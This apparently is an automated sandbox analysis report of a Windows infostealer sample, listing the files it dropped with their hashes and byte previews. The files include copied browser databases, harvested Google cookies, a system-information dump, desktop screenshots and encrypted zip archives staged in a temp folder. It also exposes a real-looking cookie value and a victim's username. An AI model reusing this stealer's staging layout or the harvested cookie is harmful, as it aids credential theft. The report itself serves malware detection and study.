                                                                                            Preview: MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...PQ.V..........................................@..................................................................................0..............hE..h:...........................................................................................text.............................. ..`.rdata...=.......>..................@..@.data....J..........................@....rsrc........0......................@..@........U....A.......S3.VW;.t"f9...A.t.....A.P.v...P..|..Y....j'.c....u..v..=..A..6P......P.....].9^.v:.^..3......h@.A.P..........P......P..|.A..E..E....;F.r.3.=p.A.;t.Sj......YP......PS....A.........P.S|..Y..5..j...x.A...t$........t$....A.........A...V...ih....P.A..F8......^.j..q.....A..U..QQ..4.A..uVj.j..E.P.5T.A.....A...t>.E.;E.w6r..E.;E.s,j*.D...P.1|..YY...t.....A.j.....@... ..4.A...E.Pj.h.....5..A.....A.3.....3.9...A.t...@....9D$.t..t$.Ph.....5..A.....A.3.....D$..`...|$..u..@....
                                                                                            C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\COIkw.tmp
                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                            Category:dropped
                                                                                            Size (bytes):20480
                                                                                            Entropy (8bit):0.698304057893793
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                                                                                            MD5:3806E8153A55C1A2DA0B09461A9C882A
                                                                                            SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
                                                                                            SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                                                                                            SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                                                                                            Malicious:false
                                                                                            Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\VYYTkRRhC.tmp
                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                            Category:dropped
                                                                                            Size (bytes):20480
                                                                                            Entropy (8bit):0.698304057893793
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                                                                                            MD5:3806E8153A55C1A2DA0B09461A9C882A
                                                                                            SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
                                                                                            SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                                                                                            SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                                                                                            Malicious:false
                                                                                            Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\WqPETvqQ.tmp
                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                            Category:dropped
                                                                                            Size (bytes):73728
                                                                                            Entropy (8bit):1.1874185457069584
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                            MD5:72A43D390E478BA9664F03951692D109
                                                                                            SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                            SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                            SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                            Malicious:false
                                                                                            Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\_Files\_AllCookies_list.txt
                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):217
                                                                                            Entropy (8bit):5.862676495872873
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:PJu3rrUVUC8JrZfMEUwROh8Xohd7SfBzS2cs7UvYf6gPS12RFEv1hCTd30S7kwTh:Pk3rYVUx1frfXoL2fgsQvYf6gOOr7kmh
                                                                                            MD5:84A7FF8E9BC5D9D1D4C63F47EB597C34
                                                                                            SHA1:324737FE53E40880903B9F32ED22FA5A8C3ECD8D
                                                                                            SHA-256:F9B326CC6D45162100FB67E805A19503440E0DF81265D3E79808AEBC903605EE
                                                                                            SHA-512:48DCBBA935E6923E72BA6DE5411EBF881BAC4D2F0B44913810DD7509701DB377AECFCD36D2B12CBB9CE49E376B444D0A99F2DBCC1215427162AEBF313273DB07
                                                                                            Malicious:false
                                                                                            Preview: .google.com.TRUE./.FALSE.1830365600.NID.204=QrjkTg5JXqxqyd4TmsCYpHdW17gM9uxfBn2Kl-kRsWwWCa7yAyLJXVM2W7-t_R9kFxdQqd55q6FGrZH7amcoOdR5mIxRgQM4bOtUpE-PIMkcwlGdK4ak8EAJLYFmvUgx3Qo8MVGHG7Wa2K5PDgfDvp9W0aMnxRQw2JLHpkU6YcY..
                                                                                            C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\_Files\_Cookies\google_chrome_new.txt
                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):217
                                                                                            Entropy (8bit):5.862676495872873
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:PJu3rrUVUC8JrZfMEUwROh8Xohd7SfBzS2cs7UvYf6gPS12RFEv1hCTd30S7kwTh:Pk3rYVUx1frfXoL2fgsQvYf6gOOr7kmh
                                                                                            MD5:84A7FF8E9BC5D9D1D4C63F47EB597C34
                                                                                            SHA1:324737FE53E40880903B9F32ED22FA5A8C3ECD8D
                                                                                            SHA-256:F9B326CC6D45162100FB67E805A19503440E0DF81265D3E79808AEBC903605EE
                                                                                            SHA-512:48DCBBA935E6923E72BA6DE5411EBF881BAC4D2F0B44913810DD7509701DB377AECFCD36D2B12CBB9CE49E376B444D0A99F2DBCC1215427162AEBF313273DB07
                                                                                            Malicious:false
                                                                                            Preview: .google.com.TRUE./.FALSE.1830365600.NID.204=QrjkTg5JXqxqyd4TmsCYpHdW17gM9uxfBn2Kl-kRsWwWCa7yAyLJXVM2W7-t_R9kFxdQqd55q6FGrZH7amcoOdR5mIxRgQM4bOtUpE-PIMkcwlGdK4ak8EAJLYFmvUgx3Qo8MVGHG7Wa2K5PDgfDvp9W0aMnxRQw2JLHpkU6YcY..
                                                                                            C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\_Files\_Information.txt
                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
                                                                                            File Type:Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):20478
                                                                                            Entropy (8bit):3.5220054843253785
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:dtM8UOpGQGXJ0eDcDDfZmEiv5bJtWmGu37mx1FqGbUpYR6PWhBzR6em7HQCV1Fav:nUOpR2J0eDcDDfZmEiv5bJtWmGu37mxJ
                                                                                            MD5:4AE64669AC7AA62D44487042C1160DFC
                                                                                            SHA1:80197A445883782FFE1B5202D133DD27D05D871B
                                                                                            SHA-256:5F5D3C0D900DF5BA6EDECA4DE1ADCDFE6B600C789E456816ED374E6097188503
                                                                                            SHA-512:EBFB62ACD47B90C636421552F407191E0E2CA3F77EE0ABA2A919C1308249F87414270D1064809453FB0144BFC0D2704FFFC38321463FD31E31D33D223CE3B0F0
                                                                                            Malicious:false
                                                                                            Preview: ..S.t.a.r.t. .B.u.i.l.d.:. . . . . . . . . . . . . .C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.3.2...A.I.D.e.t.e.c.t...m.a.l.w.a.r.e.1...2.4.4.5.3...e.x.e.....O.S.:. . . . . . . . . . . . . . . . . . . . . . .W.i.n.d.o.w.s. .1.0. .P.r.o. . . .6.4.-.b.i.t._.(.x.6.4.). . . .B.u.i.l.d.:. .1.7.1.3.4. . . .R.e.l.e.a.s.e.:. .1.8.0.3.....O.S. .L.a.n.g.u.a.g.e.:. . . . . . . . . . . . . .e.n.-.U.S.....K.e.y.b.o.a.r.d. .L.a.n.g.u.a.g.e.s.:. . . . . . .E.n.g.l.i.s.h. .(.U.n.i.t.e.d. .S.t.a.t.e.s.). .|. .....L.o.c.a.l. .D.a.t.e. .a.n.d. .T.i.m.e.:. . . . . .2.0.2.1.-.0.4.-.1.2. .1.5.:.1.1.:.1.5.....U.T.C.:. . . . . . . . . . . . . . . . . . . . . .-.0.7.0.0.....U.s.e.r.N.a.m.e. .(.C.o.m.p.u.t.e.r.N.a.m.e.).:. .a.l.f.o.n.s. .(.0.4.8.7.0.7.).....C.P.U.:. . . . . . . . . . . . . . . . . . . . . .I.n.t.e.l.(.R.). .C.o.r.e.(.T.M.).2. .C.P.U. .6.6.0.0. .@. .2...4.0. .G.H.z. .(.C.o.r.e.s.:. .4.).....T.o.t.a.l. .R.A.M.:. . . . . . . . . . . . . . . .8.1.9.1. . .M.
                                                                                            C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\_Files\_Screen_Desktop.jpeg
                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                                            Category:dropped
                                                                                            Size (bytes):70943
                                                                                            Entropy (8bit):7.810955208828877
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:IhKWugXnuxVSxuK2vCB6FZjNWvU9rZDNT9H4N:u/w6l8SUTz4N
                                                                                            MD5:147BD7675C224B0A45537355452935DD
                                                                                            SHA1:19C04930FD8FF6F4FC50EE21430C9E00D6B94448
                                                                                            SHA-256:8B7BA66004AC89DAFAFEE3A476D16B1ACC5430030FC5D5C69980F6EC1C95BB0B
                                                                                            SHA-512:C2258C7B83C826BEC4E61651FAC1032AA830589D872E3252FE4AF51E6BA8114B2EA713D468D4DFCBDF017C117DA3E433EA6C03108A2A987A21DA92D8ED44227A
                                                                                            Malicious:false
                                                                                            Preview: ......JFIF.....`.`.....C................%.....- ".%5/874/43;BUH;?P?34JdKPWZ_`_9Ghog\nU]_[...C.......+..+[=4=[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..E-.(...(..U..K2..,p$s.~...*.:-.|.+.......6.Y.t....X..s...r6.\..?....I..a..~dQ..cQS..\....^0z.8?C...D.E-..JJZJ.%%v.|>d8:.......SG.....O.. ..U..T{.f..}.2.......S..%...*./....qm...+G....3...Z.4.&P.w ..+R..(...+....Y]i_h..~H.....x..s.-....S..._?.<.._.Gt.......4..;....D.........4.T?....+...<j.....>.........,.j.k.y-.1.#...Nm....U..u.z.RR..hb%..R.(..4..kV6.....
                                                                                            C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\ckDbkngmRYjcl.zip
                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
                                                                                            File Type:Zip archive data, at least v2.0 to extract
                                                                                            Category:dropped
                                                                                            Size (bytes):66977
                                                                                            Entropy (8bit):7.995942895142831
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:43YDGVBYlU8upiPTkFetGjx5vAYShwalG8Sl9xxN7Lx:JDGolWwkLIhh9zSlLx
                                                                                            MD5:CCE283DAEC9D08A391C28C3F7BF15E43
                                                                                            SHA1:C3F9B1B6E738FEF63E07BF5E974BE198131A7F60
                                                                                            SHA-256:B50008AAD8DF9B178B8692041420D5A7276E76DDF17F217BC68E6CEC4AF6876A
                                                                                            SHA-512:FB5F5708D18085599BE320B33AC3A4C3B5DFCE41769F4450C81FEB19579F1EC909FE301E8C82388CB737E97F5FC4501353C61E68C47567AC29362E09E58F731F
                                                                                            Malicious:false
                                                                                            Preview: PK........|..R................_AllCookies_list.txtUT.....t`..t`..t`..(..=.C.e.T...t7..t.h......5...W...e/r}..?.>#.3..`7e.&..a.."Ne..p.#..}...j...n._.y1..2..Qk.....j...<|...q.F.\`h:.......)'.....8%....i...wdA.E6.8jW w ,&8r.Q.70..r.8zM...B.......v..x......L.1m.*S_%q.u...PK...!Wr........PK........|..R................_Cookies/google_chrome_new.txtUT.....t`..t`..t`...5X..d.Ge..........i......-..#..!Ss.}...)....}%......[....Z`.]..d.....V..)N&..f....P,HgKk../w..J?....;..i......._.!.2o...z.)...V`...... i.......@a.b.1.R..........e.4.C.X...K_...[."...lo..%*M.~...};$e..TPK...!Wr........PK........~..R.........O......_Information.txtUT.....t`..t`..t`...5X..d.Ge..%.L.9.hv.........*.......R0......^_...|...Zh....C..R.....L...n.UD..r....j......2!.(.......a.....).,.....*..T-....L."k.v"^..cO.,..._(=@.y.....C.......a.)....5.su.9...[k$..z..[....a..)......WTc..../Q*..j.$..f.;.=.F ...wU.....H.b .d.<f..J.B.T.}g_AX....KRB..........=X3..Ku.CI]......~D.+...<S.9.....:.=....h.....
                                                                                            C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\cmZpVs.tmp
                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                            Category:dropped
                                                                                            Size (bytes):73728
                                                                                            Entropy (8bit):1.1874185457069584
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                            MD5:72A43D390E478BA9664F03951692D109
                                                                                            SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                            SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                            SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                            Malicious:false
                                                                                            Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\files_\cookies.txt
                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):217
                                                                                            Entropy (8bit):5.859657961162949
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:PJu3rraJH4ZfMEUwROh8Xohd7SfBzS2cs7UvYf6gPS12RFEv1hCTd30S7kwTh:Pk3r2gfrfXoL2fgsQvYf6gOOr7kmh
                                                                                            MD5:0C6C5A9D776F8EE1D0D7D4A86A8B17EE
                                                                                            SHA1:06DDB1FDECD637154F8AB73C126429DDCED8B23C
                                                                                            SHA-256:BE1E4A88CD9714CAC6EBEF4E7B0C9E588BC357CB9AAD1607918BA646180B852B
                                                                                            SHA-512:A7A036901842184D219B2788320C861474DCFD4601422CE90FE139111FDAB435D4F4698B8B68724A3245E63BBCBE7EC452962C234F0D49252652BB00B38EEFC6
                                                                                            Malicious:false
                                                                                            Preview: .google.com.TRUE./.FALSE.1630345132.NID.204=QrjkTg5JXqxqyd4TmsCYpHdW17gM9uxfBn2Kl-kRsWwWCa7yAyLJXVM2W7-t_R9kFxdQqd55q6FGrZH7amcoOdR5mIxRgQM4bOtUpE-PIMkcwlGdK4ak8EAJLYFmvUgx3Qo8MVGHG7Wa2K5PDgfDvp9W0aMnxRQw2JLHpkU6YcY..
                                                                                            C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\files_\cookies\google_chrome_new.txt
                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):217
                                                                                            Entropy (8bit):5.859657961162949
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:PJu3rraJH4ZfMEUwROh8Xohd7SfBzS2cs7UvYf6gPS12RFEv1hCTd30S7kwTh:Pk3r2gfrfXoL2fgsQvYf6gOOr7kmh
                                                                                            MD5:0C6C5A9D776F8EE1D0D7D4A86A8B17EE
                                                                                            SHA1:06DDB1FDECD637154F8AB73C126429DDCED8B23C
                                                                                            SHA-256:BE1E4A88CD9714CAC6EBEF4E7B0C9E588BC357CB9AAD1607918BA646180B852B
                                                                                            SHA-512:A7A036901842184D219B2788320C861474DCFD4601422CE90FE139111FDAB435D4F4698B8B68724A3245E63BBCBE7EC452962C234F0D49252652BB00B38EEFC6
                                                                                            Malicious:false
                                                                                            Preview: .google.com.TRUE./.FALSE.1630345132.NID.204=QrjkTg5JXqxqyd4TmsCYpHdW17gM9uxfBn2Kl-kRsWwWCa7yAyLJXVM2W7-t_R9kFxdQqd55q6FGrZH7amcoOdR5mIxRgQM4bOtUpE-PIMkcwlGdK4ak8EAJLYFmvUgx3Qo8MVGHG7Wa2K5PDgfDvp9W0aMnxRQw2JLHpkU6YcY..
                                                                                            C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\files_\screenshot.jpg
                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                                            Category:dropped
                                                                                            Size (bytes):70943
                                                                                            Entropy (8bit):7.810955208828877
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:IhKWugXnuxVSxuK2vCB6FZjNWvU9rZDNT9H4N:u/w6l8SUTz4N
                                                                                            MD5:147BD7675C224B0A45537355452935DD
                                                                                            SHA1:19C04930FD8FF6F4FC50EE21430C9E00D6B94448
                                                                                            SHA-256:8B7BA66004AC89DAFAFEE3A476D16B1ACC5430030FC5D5C69980F6EC1C95BB0B
                                                                                            SHA-512:C2258C7B83C826BEC4E61651FAC1032AA830589D872E3252FE4AF51E6BA8114B2EA713D468D4DFCBDF017C117DA3E433EA6C03108A2A987A21DA92D8ED44227A
                                                                                            Malicious:false
                                                                                            Preview: ......JFIF.....`.`.....C................%.....- ".%5/874/43;BUH;?P?34JdKPWZ_`_9Ghog\nU]_[...C.......+..+[=4=[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..E-.(...(..U..K2..,p$s.~...*.:-.|.+.......6.Y.t....X..s...r6.\..?....I..a..~dQ..cQS..\....^0z.8?C...D.E-..JJZJ.%%v.|>d8:.......SG.....O.. ..U..T{.f..}.2.......S..%...*./....qm...+G....3...Z.4.&P.w ..+R..(...+....Y]i_h..~H.....x..s.-....S..._?.<.._.Gt.......4..;....D.........4.T?....+...<j.....>.........,.j.k.y-.1.#...Nm....U..u.z.RR..hb%..R.(..4..kV6.....
                                                                                            C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\files_\system_info.txt
                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
                                                                                            File Type:Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):20500
                                                                                            Entropy (8bit):3.523059949065692
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:ZqJcsOpGQGXJ0eDcDDfZmEiv5bJtWmGu37mx1FqGbUpYR6PWhBzR6em7HQCV1Fav:ELOpR2J0eDcDDfZmEiv5bJtWmGu37mxJ
                                                                                            MD5:A8FC1E5C00C9F369C78B9FBAB0C957C3
                                                                                            SHA1:A23BC83A792F1C258EC87BAE306CAC52D7728B26
                                                                                            SHA-256:97B47E22320BCF70E27BAAB1B79F3158F56298104EEECA49E658414D7132E5CD
                                                                                            SHA-512:5D1F59C059A32DA3C5944AECE0A552BF38A75FDA3EA24695BB1D4E89C8BD6E1E9A12BD72E9EECE21E23BF1DC73ABCCD392340F4DAF4BD4E7A16E9CDBB907FCF0
                                                                                            Malicious:false
                                                                                            Preview: ..E.X.E._.P.A.T.H.:. . . . . . . . . . . . . . . . . . .C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.3.2...A.I.D.e.t.e.c.t...m.a.l.w.a.r.e.1...2.4.4.5.3...e.x.e.....O.p.e.r.a.t.i.n.g. .s.y.s.t.e.m.:. . . . . . . . . . .W.i.n.d.o.w.s. .1.0. .P.r.o. . . .6.4.-.b.i.t.(.x.6.4.). . . .b.u.i.l.d.:. .1.7.1.3.4. . . .r.e.l.e.a.s.e.:. .1.8.0.3.....O.p.e.r.a.t.i.n.g. .s.y.s.t.e.m. .l.a.n.g.u.a.g.e.:. .e.n.-.U.S.....K.e.y.b.o.a.r.d. .l.a.n.g.u.a.g.e.s.:. . . . . . . . .E.n.g.l.i.s.h. .(.U.n.i.t.e.d. .S.t.a.t.e.s.). ./. .....L.o.c.a.l. .D.a.t.e. .a.n.d. .T.i.m.e.:. . . . . . . .2.0.2.1.-.0.4.-.1.2. .1.5.:.1.1.:.1.5.....U.T.C.:. . . . . . . . . . . . . . . . . . . . . . . .-.0.7.0.0.....U.s.e.r.n.a.m.e. .(.C.o.m.p.u.t.e.r.n.a.m.e.).:. . . .a.l.f.o.n.s. .(.0.4.8.7.0.7.).....C.P.U.:. . . . . . . . . . . . . . . . . . . . . . . .I.n.t.e.l.(.R.). .C.o.r.e.(.T.M.).2. .C.P.U. .6.6.0.0. .@. .2...4.0. .G.H.z. .(.c.o.r.e.s.:. .4.).....M.e.m.o.r.y. .r.a.m.:. . . . . . .
                                                                                            C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\gLbcxbHAcf.zip
                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
                                                                                            File Type:Zip archive data, at least v2.0 to extract
                                                                                            Category:dropped
                                                                                            Size (bytes):66965
                                                                                            Entropy (8bit):7.995938433759595
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:Eo013k/ncxu3747WQAUTKswJaqY9iEgz2aAsW39I0/sPMkRMA5vJF1:1pcqSwJav9TgC97L/sPMhcxF1
                                                                                            MD5:277C6865085640C839AB779F2541C094
                                                                                            SHA1:5DEEA06ADC10348C8D9B5F0EF6165066AE66E882
                                                                                            SHA-256:89B3F9DC3F127C90A147FAD3331B4280B418ABD584B123DA3CBFB8CBB7F13A50
                                                                                            SHA-512:CB7C49C08642F84BAA6B3B1FF631FB69F7217E1425999FF105DF4090015C83D5BD9D2421B6F6293889AAD17340007A573AC82ED50CFAF2FF0D9CDE79DDB25BB9
                                                                                            Malicious:false
                                                                                            Preview: PK........|..R................cookies/google_chrome_new.txtUT.....t`..t`..t`%c.vN.0.' .o.xM..bX...P.f.....g!.z].....X....:.y..4....m...[.A....cm\. ..Q...i..k.Z..+.......DhH"....8$.C.M.7@._.].R...#X'B ..i....!..]U....q.....`q...w]t...U....+.K..D.S.E.N.....n.m..'8...:[0..X.MW.*`PK...a.L........PK........|..R................cookies.txtUT.....t`..t`..t`%c.vN.0.' .o.xM..bX...P.f.....g!.z].....X....:.y..4....m...[.A....cm\. ..Q...i..k.Z..+.......DhH"....8$.C.M.7@._.].R...#X'B ..i....!..]U....q.....`q...w]t...U....+.K..D.S.E.N.....n.m..'8...:[0..X.MW.*`PK...a.L........PK........~..R................screenshot.jpgUT.....t`..t`..t`%w..........r..n.]..........*.l..%L.A|.T..`...._.Y...R:...?.B.YNJs?@2s.[q...43J....`Y5...$...;?.....o....?e.MAV...zZ;.?.WPH...S..8.| a.....96.8..)..*./...6...._K#..om.].h.H...<...8..8......L.U.q.....i{..B.yF..s.<...cT...U.__.......m.....O.....C|.>.<~B....#L..X*.Y..0.(..HW..-...L..b....bfF.z..@...wP.E.O=.vHw...a.....}z.3=.8.
                                                                                            C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\puElfsbI.tmp
                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                            Category:dropped
                                                                                            Size (bytes):40960
                                                                                            Entropy (8bit):0.792852251086831
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                            MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                            SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                            SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                            SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                            Malicious:false
                                                                                            Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\vByrel.tmp
                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                            Category:dropped
                                                                                            Size (bytes):40960
                                                                                            Entropy (8bit):0.792852251086831
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                            MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                            SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                            SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                            SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                            Malicious:false
                                                                                            Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\UAC.dll
                                                                                            Process:C:\Users\user\AppData\Local\Temp\Murano.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):14848
                                                                                            Entropy (8bit):5.715583967305762
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:DiF6v2imI36Op/tGZGfWxdyWHD0I53vLl7WVl8e04IpDlPjs:DGVY6ClGoWxXH75T1WVl83lLs
                                                                                            MD5:ADB29E6B186DAA765DC750128649B63D
                                                                                            SHA1:160CBDC4CB0AC2C142D361DF138C537AA7E708C9
                                                                                            SHA-256:2F7F8FC05DC4FD0D5CDA501B47E4433357E887BBFED7292C028D99C73B52DC08
                                                                                            SHA-512:B28ADCCCF0C33660FECD6F95F28F11F793DC9988582187617B4C113FB4E6FDAD4CF7694CD8C0300A477E63536456894D119741A940DDA09B7DF3FF0087A7EADA
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: SecuriteInfo.com.ArtemisAFF6F8C75217.6228.exe, Detection: malicious, Browse
                                                                                            • Filename: file.exe, Detection: malicious, Browse
